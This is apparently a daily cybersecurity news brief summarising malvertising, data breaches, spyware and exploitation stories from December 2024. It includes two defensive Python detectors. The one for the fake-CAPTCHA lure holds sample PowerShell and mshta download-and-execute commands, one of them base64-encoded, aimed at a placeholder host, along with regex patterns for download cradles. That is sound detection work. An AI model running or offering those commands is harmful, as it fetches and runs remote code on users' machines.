Daily Brief

Summaries below are generated automatically.

2024-12-16 19:32:27 theregister NATION STATE ACTIVITY Trump Plans Offensive Cyber Strategy Against China
President-elect Trump's administration intends to adopt a proactive offensive strategy in cybersecurity against nation-state adversaries. Congressman Mike Waltz, the proposed national security advisor, criticized previous administrations for focusing excessively on defense in cyber warfare. Waltz highlighted active threats from Chinese cyber groups such as Salt Typhoon and Volt Typhoon, the latter having recently reactivated a botnet targeting critical infrastructure. The Trump administration is considering collaboration with the private tech sector to enhance U.S. cybersecurity capabilities and to potentially target adversaries. Details regarding the implementation of this new cyber approach remain vague, though sanctions and altering international cyber doctrines were hinted at. U.S.-China cyber relations are tense, with mutual accusations of hacking and non-compliance with a 2015 pact to avoid cyber attacks on each other. The potential for a cyber arms race or escalation in retaliatory measures between the U.S. and China is a significant concern.
2024-12-16 19:32:26 bleepingcomputer MALWARE Large-Scale Malvertising Campaign Distributes Lumma Infostealer
A malvertising campaign that Guardio Labs calls "DeceptionAds" used fake CAPTCHA verification pages to distribute the Lumma Stealer infostealer. The campaign ran through the Monetag ad network, serving over a million ad impressions a day across roughly 3,000 websites. The fake CAPTCHA pages instructed visitors to copy a PowerShell command to the clipboard and run it themselves, which downloaded and installed Lumma Stealer on the machine. The malware harvests passwords, payment-card data and cryptocurrency-wallet data from popular browsers, plus text files. Monetag and BeMob, the ad and tracking platforms involved, disrupted the campaign after Guardio Labs reported it, but it has since resurfaced. Guardio Labs advises users never to execute commands copied from a web page and to avoid high-risk sites such as pirated-content portals.
2024-12-16 18:06:25 theregister DATA BREACH Major Cyberattack Compromises Rhode Island's Benefit Portal Data
Deloitte, which operates RIBridges, the Rhode Island government portal that handles eligibility and applications for social-services programs, has reported a significant cyberattack on the system. The breach likely exposed personal and financial information, including names, Social Security numbers and banking details, of people who have interacted with the system. The exact number of affected individuals is not yet known, but anyone who has applied for health coverage or human-services benefits in Rhode Island could be impacted. Deloitte has begun remediation and engaged Experian to run a support call center, although call-center staff may not be able to confirm whether a specific individual is affected. RIBridges is currently offline, so residents who need services must fall back to paper applications. Reports attribute the attack to an international cybercriminal group; Deloitte first identified suspicious activity on December 5 and confirmed the breach on December 10. Governor Dan McKee has acknowledged the severity of the incident and said the state is working with IT experts and law enforcement to limit its impact. Deloitte maintains that only the client-specific RIBridges environment was compromised and that no other systems on its network were affected.
2024-12-16 17:30:49 bleepingcomputer DATA BREACH Major Health Data Breach Affects Over 910,000 Patients
A breach at ConnectOnCall, a telehealth and after-hours call service owned by Phreesia, has affected more than 910,000 patients. An unauthorized party had access to the service from February to May 2024. Exposed data includes names, phone numbers and medical information, and for some individuals Social Security numbers. Phreesia notified law enforcement, brought in outside cybersecurity experts and temporarily took ConnectOnCall offline; it is rebuilding the service in a new environment separated from other Phreesia products. There is currently no evidence that other Phreesia services were affected or that the exposed information has been misused. Affected individuals are encouraged to watch for and report any suspected identity theft or fraud linked to the breach.
2024-12-16 16:55:18 bleepingcomputer DATA BREACH Rhode Island Reports Data Breach After Ransomware Attack
Rhode Island's RIBridges benefits system, operated by Deloitte, was compromised by the Brain Cipher ransomware gang, which likely stole personally identifiable information including names, Social Security numbers and bank details. The intrusion was discovered on December 5, 2024. After confirming the presence of malicious code, Deloitte took the RIBridges online services offline to cut off further access. Affected individuals are advised to reset passwords, place fraud alerts and freeze their credit. While the portal is down, residents can still apply for assistance programs by paper application, and a dedicated call center has been set up to support impacted individuals. Deloitte is investigating the incident in collaboration with state authorities and law enforcement.
2024-12-16 15:09:01 bleepingcomputer NATION STATE ACTIVITY Serbian Government Allegedly Uses NoviSpy Spyware on Android Devices
Amnesty International reports that Serbian authorities have been installing NoviSpy spyware on the Android phones of activists, journalists and protesters, and that the phones were unlocked while in police custody using Cellebrite tools that exploited previously unknown Qualcomm vulnerabilities. One of the exploited flaws, CVE-2024-43047, was identified by Google Project Zero and Amnesty's Security Lab after forensic analysis of a journalist's phone; Qualcomm fixed it in October 2024 and the patch shipped in Android's November 2024 security update. NoviSpy is attributed to Serbia's Security Information Agency (BIA). Amnesty's analysis suggests the spyware may have been deployed on hundreds of devices, and in at least one case Amnesty suspects a zero-click infection path abusing Android's calling features rather than physical access. Google's Threat Analysis Group (TAG), working from kernel panic logs that Amnesty provided, identified six vulnerabilities in Qualcomm's adsprpc (DSP RPC) driver. Qualcomm has patched some of these, but fixes for the rest slipped past the standard 90-day disclosure window; Qualcomm says fixes are developed and will be published in upcoming security bulletins.
2024-12-16 14:23:18 thehackernews MALWARE DeceptionAds Campaign Employs Captchas to Steal Information
Guardio Labs has documented a malvertising campaign it calls DeceptionAds, which abuses a single ad network to serve malicious ads at scale. Visitors to sites such as pirated-content portals are redirected to fake CAPTCHA pages that trick them into running commands on their own machines; those commands install infostealers such as Lumma and, in some cases, remote access trojans and post-exploitation tooling. The ads are delivered through Monetag, and the operators use the BeMob ad-tracking service as a cloaking layer, which makes the traffic harder for ad-network moderation to tell apart from legitimate campaigns. The chain has several layers: deceptive publisher sites, a traffic distribution system, and reputable cloud services hosting the fake CAPTCHA pages. After the research was published, more than 200 related accounts were terminated on Monetag and BeMob, but the campaign has shown signs of resuming. Guardio Labs argues that the cycle underscores the need for stricter content moderation, stronger account validation and greater accountability across digital advertising networks.
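The lure in both DeceptionAds write-ups above ends with the user pasting a PowerShell or mshta one-liner into the Run dialog, so the process tree (powershell.exe or mshta.exe spawned by explorer.exe with hidden-window, encoded-command or download-cradle arguments) is the natural detection point. The following Python is an added example, not Guardio Labs' or the page's own code: it scores constructed process-creation events against weighted indicators and, when it sees an encoded command, decodes the base64/UTF-16LE blob and scores what the blob would run. The weights, the alert threshold, the sample command lines and the hosts captcha-check.example and updates.example are all invented for this illustration.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (what a Sysmon event ID 1 or 4688 would carry)."""
    parent_image: str
    image: str
    command_line: str


# Weighted command-line indicators of the paste-and-run lure. Weights and the
# alert threshold are hypothetical values chosen for this example.
TEXT_RULES = {
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "policy_bypass": (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 1),
    "download_cradle": (re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b",
        re.I), 2),
    "invoke_expression": (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 1),
    "remote_hta": (re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I), 3),
}
# -e / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
ENCODED_WEIGHT = 2
RUN_DIALOG_WEIGHT = 1   # Win+R launches the shell as a child of explorer.exe
THRESHOLD = 3


def decode_encoded_command(blob: str) -> str:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; return '' if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one process-creation event."""
    score, hits = 0, []
    texts = [ev.command_line]
    m = ENCODED_RE.search(ev.command_line)
    if m:
        hits.append("encoded_command")
        score += ENCODED_WEIGHT
        decoded = decode_encoded_command(m.group(1))
        if decoded:
            texts.append(decoded)   # inspect what the blob actually runs, not just that it exists
    for name, (rx, weight) in TEXT_RULES.items():
        if any(rx.search(t) for t in texts):
            hits.append(name)
            score += weight
    if ev.parent_image.lower().endswith("explorer.exe"):
        hits.append("run_dialog_parent")
        score += RUN_DIALOG_WEIGHT
    return score, hits


def flag_events(events: list[ProcessEvent]) -> list[tuple[int, int, list[str]]]:
    """Return (index, score, indicators) for every event at or above THRESHOLD."""
    flagged = []
    for i, ev in enumerate(events):
        score, hits = score_event(ev)
        if score >= THRESHOLD:
            flagged.append((i, score, hits))
    return flagged


# Constructed sample events (placeholder hosts, not real indicators).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://captcha-check.example/v')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -ep bypass -c "iex (irm https://captcha-check.example/verify.txt)"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://captcha-check.example/verify.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, f"powershell -nop -w hidden -enc {ENCODED_PAYLOAD}"),
    # benign: scheduled admin script and an agent download by a service, neither from the Run dialog
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\System32\services.exe", PS,
                 'powershell -c "Invoke-WebRequest https://updates.example/agent.msi -OutFile C:\\tmp\\agent.msi"'),
]

if __name__ == "__main__":
    for idx, score, hits in flag_events(SAMPLE_EVENTS):
        print(f"event {idx}: score={score} indicators={hits}")
```

The three lure events score 6, 4 and 7 and are flagged; the two administrative events score 1 and 2 and are not. The parent-process check is what keeps ordinary scripted use of `-ExecutionPolicy Bypass` or `Invoke-WebRequest` below the threshold, so a real rule should tune the weights against your own baseline of explorer.exe-spawned shells.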
2024-12-16 12:47:02 thehackernews CYBERCRIME NoviSpy Spyware Targeting Journalists and Activists, Exposing Data
A Serbian journalist's phone was infected with NoviSpy spyware after police unlocked it with a Cellebrite tool during his detention. NoviSpy gives its operators remote access to the microphone and camera and harvests sensitive personal data; its targets include activists and journalists, pointing to state involvement in surveillance. Amnesty International's technical report indicates that NoviSpy was installed over Android Debug Bridge (ADB) once the phone was unlocked, and that development of the spyware dates back to at least 2018. Cellebrite, an Israeli firm, says it is investigating the alleged misuse of its tools and will cut ties with agencies that violate its agreements. The zero-day the Cellebrite tool used to gain access to the devices, a flaw in Qualcomm chipset software, was patched in October 2024. Technology companies and human rights groups are urging the EU to address the misuse of commercial surveillance technologies. Similar abuse of spyware against civilians for surveillance and political repression has been reported in China and Russia.
2024-12-16 12:16:33 thehackernews MALWARE Global Exploitation of Cleo Software Vulnerability Uncovered
2024-12-16 11:00:38 thehackernews MISCELLANEOUS Ensuring CI/CD Pipeline Compliance in AI Development
CI/CD pipeline governance balances rapid delivery against security, regulatory and organizational standards. A governance framework defines the checks a change must pass before it ships, and this matters more as pipelines handle sensitive data and as AI components enter both the software and the pipeline itself, which calls for transparency and accountability about what was built and how. Integrating AI into DevOps needs explicit policies for compliance, security and responsible AI development, enforced by automated checks in the pipeline rather than by manual review alone. Automated compliance and security testing at every stage helps ensure that AI models meet predefined ethical and regulatory requirements. Comprehensive logging, monitoring and auditing of pipeline activity is essential for demonstrating compliance and for post-incident analysis, particularly for deployed AI models. Regular pipeline audits surface improvement areas and keep the governance framework current as technology and regulation change. A culture of compliance and security awareness among developers underpins all of this.
2024-12-16 10:19:59 thehackernews CYBERCRIME Global Scam Uses AI and Social Media to Phish and Defraud
ESET researchers describe an investment scam they call Nomani, whose activity grew 335% from the first to the second half of 2024. It uses malvertising on social media, with AI-generated video testimonials and posts carrying hijacked company branding, to draw victims to phishing pages that collect their personal data. Many of the ads target previous scam victims with promises of recovering their lost funds. The operators reuse stolen identities and profiles of legitimate small businesses and government entities to promote cryptocurrency investment lures under a variety of names. Once they have a victim's contact details, the scammers engage directly, pushing investments in fake financial products and requesting further personal and payment data under the pretext of enabling payouts. Russian-speaking actors are likely behind the operation, which uses Yandex tools to track victims and manage its phishing infrastructure. Beyond direct financial loss, the scam harvests extensive personal data and works to get around banks' fraud-prevention measures. Separately, South Korean law enforcement has dismantled a large online fraud operation built on fake trading platforms, illustrating the global scale of this kind of fraud.
2024-12-16 09:14:12 thehackernews MALWARE New Glutton Malware Targets Cybercriminals with PHP Backdoors
Researchers at QiAnXin XLab have identified a PHP-based malware framework, named Glutton, with victims mainly in China, the United States, Cambodia, Pakistan and South Africa. Glutton is attributed with moderate confidence to the Chinese state-backed group Winnti and has the unusual trait of targeting the cybercrime market itself, turning criminals' own tools and hosts against them. It is deployed on systems running popular PHP frameworks such as Laravel and ThinkPHP, where it harvests sensitive data, drops an ELF backdoor and injects code into PHP files. Initial access comes from exploiting zero-day and known vulnerabilities, brute-force attacks, and advertising already-compromised hosts on cybercrime forums so that other criminals pick them up. The framework is highly modular: the primary "task_loader" module sets up the execution environment and fetches further components. Glutton lacks the stealth measures seen in other sophisticated malware; it communicates over unencrypted HTTP and its samples are not obfuscated. Its ability to fetch and run PHP payloads covertly is paired with an intelligence-gathering role, collecting information on cybercrime operators that could inform future attacks.
2024-12-16 06:47:47 thehackernews NATION STATE ACTIVITY Ukrainian Minors Used by Russian FSB for Reconnaissance Missions
Ukraine's Security Service (SSU) has detained two groups of minors, aged 15 and 16, whom Russia's FSB recruited for espionage in Kharkiv. Under the guise of playing "quest" games, the teenagers carried out reconnaissance, helped adjust strikes and committed arson. They were tasked with collecting and transmitting coordinates, photos and videos of strategic locations, and the information they supplied was used to direct multiple Russian airstrikes on Kharkiv. All of the minors have been detained; one organizer faces life imprisonment, and an FSB liaison officer has been charged in absentia under Ukraine's sabotage laws. Separately, Ukraine's CERT-UA has warned of new cyberattacks on defense entities by UAC-0185, a Russia-linked threat actor.
2024-12-16 00:02:42 theregister MISCELLANEOUS Security Lapses in Prometheus and Netscaler; API Key Compromise
Aqua Security found roughly 296,000 Prometheus Node Exporter instances and about 40,000 Prometheus servers exposed to the internet without authentication. Exposed instances can leak sensitive data such as tokens, API keys and internal system and image details, are open to repojacking (exporters that point at abandoned GitHub repositories), and can be taken down through the unauthenticated /debug/pprof profiling endpoint. Citrix has warned that NetScaler appliances are being targeted by password-spraying attacks, with critical-infrastructure organizations particularly affected; multi-factor authentication and strong password policies are recommended. The U.S. Department of Justice has taken down Rydox, an online marketplace for stolen personal data, arresting its administrators and seizing the platform. BeyondTrust reported that an API key for its Remote Support SaaS was compromised, which could have allowed unauthorized password resets on local application accounts. A campaign impersonating video-conferencing software is deploying the Realst infostealer to steal cryptocurrency-wallet data and other credentials. Apple has released patches for vulnerabilities in iOS and macOS and is encouraging users to update promptly.
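Password spraying against NetScaler (or any internet-facing gateway) looks different from brute force in the authentication log: one source fails once or twice against many accounts rather than many times against one, which is exactly what per-account lockout thresholds miss. The following Python is an added example, not Citrix's or the page's own code: it parses a constructed log format (not NetScaler's syslog layout), finds sources whose failures span many distinct accounts inside a sliding window, separates that from single-account brute force, and lists any successful login from a spraying source as the first account to reset. The thresholds, window size and sample addresses (TEST-NET ranges) are assumptions for the illustration.

```python
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format for this example (not NetScaler's own syslog layout):
#   <ISO-8601 timestamp> src=<ip> user=<name> result=SUCCESS|FAILURE
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+user=(?P<user>\S+)\s+result=(?P<result>\S+)$"
)

WINDOW = timedelta(minutes=10)   # sliding window for both detections (assumed value)
SPRAY_MIN_USERS = 5              # distinct accounts one source must fail against
BRUTE_MIN_FAILURES = 8           # failures against a single account from one source


def parse_line(line: str):
    """Return (timestamp, src, user, result) or None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return ts, m["src"], m["user"], m["result"].upper()


def analyse(lines):
    """Map each suspicious source IP to a finding describing the pattern observed."""
    failures = defaultdict(list)   # src -> [(ts, user)]
    successes = defaultdict(set)   # src -> {user}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                # skip unrelated or malformed lines
        ts, src, user, result = rec
        if result == "FAILURE":
            failures[src].append((ts, user))
        elif result == "SUCCESS":
            successes[src].add(user)

    findings = {}
    for src, events in failures.items():
        events.sort()
        best_users = best_fail = 0
        start = 0
        for end in range(len(events)):
            # advance the window start so events[start..end] spans at most WINDOW
            while events[end][0] - events[start][0] > WINDOW:
                start += 1
            window = events[start:end + 1]
            users = len({u for _, u in window})
            if users > best_users or (users == best_users and len(window) > best_fail):
                best_users, best_fail = users, len(window)
        if best_users >= SPRAY_MIN_USERS:
            kind = "password_spray"      # few tries each, spread across many accounts
        elif best_fail >= BRUTE_MIN_FAILURES:
            kind = "brute_force"         # many tries against one account
        else:
            continue
        findings[src] = {
            "kind": kind,
            "failures": best_fail,
            "distinct_users": best_users,
            # a success from a spraying source is the account to reset first
            "successes_from_source": sorted(successes[src]),
        }
    return findings


# Constructed sample log: a spray that lands one account, a single-account brute
# force, a user who mistypes twice, and one unrelated line.
SAMPLE_LOG = """\
2024-12-16T10:00:01Z src=203.0.113.5 user=alice result=FAILURE
2024-12-16T10:00:45Z src=203.0.113.5 user=bob result=FAILURE
2024-12-16T10:01:30Z src=203.0.113.5 user=carol result=FAILURE
2024-12-16T10:02:15Z src=203.0.113.5 user=dave result=FAILURE
2024-12-16T10:03:00Z src=203.0.113.5 user=erin result=FAILURE
2024-12-16T10:03:40Z src=203.0.113.5 user=frank result=FAILURE
2024-12-16T10:05:10Z src=203.0.113.5 user=dave result=SUCCESS
2024-12-16T10:10:00Z src=198.51.100.7 user=bob result=FAILURE
2024-12-16T10:10:15Z src=198.51.100.7 user=bob result=FAILURE
2024-12-16T10:10:30Z src=198.51.100.7 user=bob result=FAILURE
2024-12-16T10:10:45Z src=198.51.100.7 user=bob result=FAILURE
2024-12-16T10:11:00Z src=198.51.100.7 user=bob result=FAILURE
2024-12-16T10:11:15Z src=198.51.100.7 user=bob result=FAILURE
2024-12-16T10:11:30Z src=198.51.100.7 user=bob result=FAILURE
2024-12-16T10:11:45Z src=198.51.100.7 user=bob result=FAILURE
2024-12-16T10:20:00Z src=192.0.2.10 user=alice result=FAILURE
2024-12-16T10:20:20Z src=192.0.2.10 user=alice result=FAILURE
2024-12-16T10:20:40Z src=192.0.2.10 user=alice result=SUCCESS
2024-12-16T10:21:00Z session cleanup completed
""".splitlines()

if __name__ == "__main__":
    for src, finding in analyse(SAMPLE_LOG).items():
        print(src, finding)
```

On the sample, 203.0.113.5 is reported as a password spray across six accounts with a later success for dave, 198.51.100.7 as brute force with eight failures against bob, and 192.0.2.10 is not reported at all. Sprays in practice are slower and rotate source addresses, so the same logic is usually run over a longer window and keyed additionally on user-agent or ASN rather than single IPs.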
2024-12-15 20:15:37 bleepingcomputer CYBERCRIME Clop Ransomware Confirms Involvement in Cleo Data Theft
The Clop ransomware gang has claimed responsibility for the recent data-theft attacks on users of Cleo's managed file-transfer software. The attacks exploited CVE-2024-50623, a critical vulnerability that allows unauthorized file upload and download and leads to remote code execution. Cleo's original fix for the flaw was incomplete, so exploitation continued after the patch was released. During exploitation the attackers installed a Java backdoor that gave them persistent access for further data theft and movement into the victim's network. CISA has confirmed that CVE-2024-50623 is being used in ransomware operations. Clop says it has deleted data stolen in earlier campaigns and will focus on new targets. The number of affected companies is unknown, and Cleo has not publicly confirmed the breach.